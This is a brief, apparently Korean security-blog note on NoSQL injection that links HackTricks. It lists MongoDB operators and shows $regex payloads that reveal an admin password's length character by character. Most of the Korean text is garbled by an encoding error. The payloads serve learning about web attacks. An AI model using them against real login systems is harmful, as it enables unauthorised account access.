728x90
๋ฐ์ํ
https://book.hacktricks.xyz/pentesting-web/nosql-injection
NoSQL injection - HackTricks
Brute-force login usernames and passwords from POST login
book.hacktricks.xyz
[$ne] : ๊ฐ์ง ์์ ๊ฒฝ์ฐ(not equals)
[$regex] : ์ ๊ทํํ์
[$eq] : ๊ฐ๋ค(=)
[$lt] : ์๋ค(<)
[$gt] : ํฌ๋ค(>)
[$lte] : ์๊ฑฐ๋ ๊ฐ๋ค(<)
[$gte] : ํฌ๊ฑฐ๋ ๊ฐ๋ค(>)
$regex๋ก ํจ์ค์๋ ๊ธธ์ด ์์๋ด๊ธฐ
"password": {"$regex":".{1}"} => admin
"password": {"$regex":".{2}"} => admin
...
"password": {"$regex":".{5}"} => admin (5 ๊ธ์!)
"password": {"$regex":".{6}"} => undefined
728x90
๋ฐ์ํ
'๐์ ๋ณด๋ณด์ > ์น ๋ณด์' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
์น ํดํน - sqlmap (0) | 2022.07.24 |
---|---|
์น ํดํน - ์น ํจํท ์ ์ก ํ์ฅ ํ๋ก๊ทธ๋จ (0) | 2021.12.09 |
์น ํดํน - ํฌ๋กฌ ์คํ์ด์จ์ด ํ์ฅ ํ๋ก๊ทธ๋จ , Bad Extension (0) | 2021.12.08 |
์น ํดํน - XSS ๊ณต๊ฒฉ์ผ๋ก document.cookie ์ ๋ณด ๊ฐ์ ธ์ค๊ธฐ ๋ฐฉ์ง(HttpOnly) (0) | 2021.11.25 |
[WEB-HACKING] HTML ์ด๋ฒคํธ ์์ฑ ๋ชจ์ & XSS ์์ฉ (0) | 2021.11.15 |